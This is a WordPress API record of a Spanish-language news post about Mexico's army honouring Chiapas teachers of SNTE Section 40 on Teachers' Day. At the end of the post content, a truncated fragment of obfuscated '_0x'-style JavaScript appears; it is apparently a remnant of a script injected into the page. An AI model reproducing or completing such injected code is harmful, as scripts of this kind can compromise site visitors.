{"id":2369,"date":"2022-05-26T01:46:20","date_gmt":"2022-05-26T01:46:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2369"},"modified":"2022-05-26T01:46:21","modified_gmt":"2022-05-26T01:46:21","slug":"sedena-homenajea-al-magisterio-de-la-seccion-40","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2369","title":{"rendered":"Sedena homenajea al magisterio de la Secci\u00f3n 40"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220525-WA0031-1024x682.jpg\" alt=\"\" class=\"wp-image-2370\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220525-WA0031-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220525-WA0031-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220525-WA0031-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220525-WA0031-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220525-WA0031.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Redacci\u00f3n.<br>25 de mayo de 2022. Tuxtla Guti\u00e9rrez.- En conmemoraci\u00f3n al \u201cD\u00eda del Maestro\u201d, la Sedena a trav\u00e9s de la VII Regi\u00f3n Militar, celebra al magisterio chiapaneco de la Secci\u00f3n40 del SNTE.<br>En una celebraci\u00f3n que ratifica el trabajo colaborativo en seguimiento a los convenios suscritos entre estas instituciones; dando certeza de la unidad entre SNTE-SEDENA como agentes de cambio y con el objetivo de generar un espacio permanente que permitan fortalecer a la educaci\u00f3n y la escuela p\u00fablica como detonantes del desarrollo comunitario, regional y nacional.<br>los integrantes del Ej\u00e9rcito Mexicano, felicitan a todos los educadores por la ardua labor que realizan d\u00eda a d\u00eda, reconociendo con ello, su dedicaci\u00f3n, su esfuerzo y su entrega para dejar en la mente de sus estudiantes el ideal de ser mejores, formando excelentes ciudadanos que conviertan a M\u00e9xico en una sociedad encaminada al progreso.<br>Durante esta celebraci\u00f3n, se cont\u00f3 con la participaci\u00f3n de la Banda de M\u00fasica de la VII Regi\u00f3n Militar, la cual ameniz\u00f3 el desayuno brindado a los docentes, con autoridades Militares y con representantes de la Secci\u00f3n 40 del Sindicato Nacional de Trabajadores de la Educaci\u00f3n, distinguiendo con ello, su infatigable tarea en la transmisi\u00f3n de conocimientos y ense\u00f1anza de valores.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n.25 de mayo de 2022. Tuxtla Guti\u00e9rrez.- En conmemoraci\u00f3n al \u201cD\u00eda del Maestro\u201d, la Sedena a trav\u00e9s de la VII Regi\u00f3n Militar, celebra al magisterio chiapaneco de la Secci\u00f3n40 del SNTE.En una celebraci\u00f3n que ratifica el trabajo colaborativo en seguimiento a los convenios suscritos entre estas instituciones; dando certeza de la unidad entre SNTE-SEDENA como &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2370,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-2369","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2369","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2369"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2369\/revisions"}],"predecessor-version":[{"id":2371,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2369\/revisions\/2371"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2370"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2369"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2369"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2369"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}